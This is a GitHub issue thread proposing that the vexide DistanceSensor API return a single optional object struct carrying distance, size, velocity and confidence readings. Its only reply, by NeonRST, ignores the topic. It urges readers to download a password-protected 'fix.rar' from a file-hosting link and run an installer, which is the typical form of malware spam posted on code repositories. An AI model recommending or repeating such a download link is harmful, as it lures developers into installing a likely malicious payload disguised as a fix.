### ISSUE TITLE
Refactor the `DistanceSensor` API

### ISSUE THREAD

**Issue by Tropix126** [vexide/vexide#119]
## What's the motivation for this feature?
Right now the distance sensor has a lot of methods individually returning `Option<T>` depending on if a object was detected or not. This is kind of bad for multiple reasons (e.g. some methods [potentially silently failing](https://i.imgur.com/lopBGpF.png) due to bad heuristic checks).

## Describe the solution you'd like
- Distance sensor's readings should be returned as a single `Option<DistanceObject>` struct, containing `distance`, `relative_size`, `velocity`, and `confidence` values. We should return `None` if `vexDeviceDistanceDistanceGet(dev) == 9999` and ignore all other readings in that case.
- I'm not *totally* sure that `confidence` is tied to whether or not an object was detected or not, so that should be tested.

Example:
```rs
if let Some(object) = sensor.object().unwrap() {
  println!("{} {} {}", object.distance(), object.size(), object.velocity())
}
```

## Describe the drawbacks, if any
Not sure, might make some things slightly more annoying API wise, although not much more than they are now. It's a more accurate a rust-y model of how the hardware actually operates.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
